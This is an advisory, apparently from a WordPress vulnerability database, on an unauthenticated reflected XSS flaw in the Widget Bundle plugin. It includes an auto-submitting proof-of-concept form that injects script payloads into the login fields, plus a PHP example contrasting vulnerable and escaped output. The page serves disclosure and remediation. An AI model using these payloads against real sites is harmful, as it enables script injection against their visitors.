Source: wpexploit
Author: Bob Matyas
ID: WPEX-ID:D203BF3B-AEE9-4755-B429-D6BBDD940890
Published: May 31, 2024 - 12:00 a.m.

Widget Bundle <= 2.0.0 - Unauthenticated Reflected XSS


AI Score: 6.2 (Confidence: High)

EPSS: 0.001 (Percentile: 17.0%)

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue which could only be used against unauthenticated users.

On a site with the User Login/Registration widget active, have an unauthenticated user send a POST request to any page where the widget appears:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com" method="post">
        <input type="hidden" name="login_username" value='"><script>alert(1)</script>' />
        <input type="hidden" name="login_password" value='"><script>alert(2)</script>' />
        <input type="hidden" name="widget_login_submit" value="Login" />
        <input type="submit" value="Submit" />
    </form>
</body>
```
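The missing output escaping described above, shown beside a hardened form. This is an added example, not the plugin's source and not code from the original advisory: the two render functions are hypothetical, and the assumption that the value is reflected into an HTML attribute is inferred from the `">` prefix in the request above.

```php
<?php
// Hypothetical widget rendering code (assumption), not the plugin's source.
// Field names login_username and widget_login_submit are taken from the
// request shown in the advisory.

// Stand-in so the file runs outside WordPress with the PHP CLI; inside
// WordPress the core esc_attr() is already defined and is used instead.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern: the submitted value is concatenated into the
// value attribute unchanged, so a double quote ends the attribute.
function render_username_field_vulnerable(array $post) {
    $user = isset($post['login_username']) ? $post['login_username'] : '';
    return '<input type="text" name="login_username" value="' . $user . '" />';
}

// Hardened pattern: accept only strings and escape at output time for the
// HTML attribute context. In WordPress, pass wp_unslash($_POST) as $post.
function render_username_field_hardened(array $post) {
    $user = (isset($post['login_username']) && is_string($post['login_username']))
        ? $post['login_username']
        : '';
    return '<input type="text" name="login_username" value="' . esc_attr($user) . '" />';
}

// A submitted password is never written back into the page, so there is
// nothing to escape for login_password.
function render_password_field_hardened() {
    return '<input type="password" name="login_password" value="" />';
}

// Constructed sample input mirroring the first field of the request above.
$post = array(
    'login_username'      => '"><script>alert(1)</script>',
    'widget_login_submit' => 'Login',
);

// Markup breaks out of the attribute and a script element follows.
echo render_username_field_vulnerable($post), "\n";
// Quote and angle brackets are entity-encoded and stay inside the attribute.
echo render_username_field_hardened($post), "\n";
echo render_password_field_hardened(), "\n";
```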
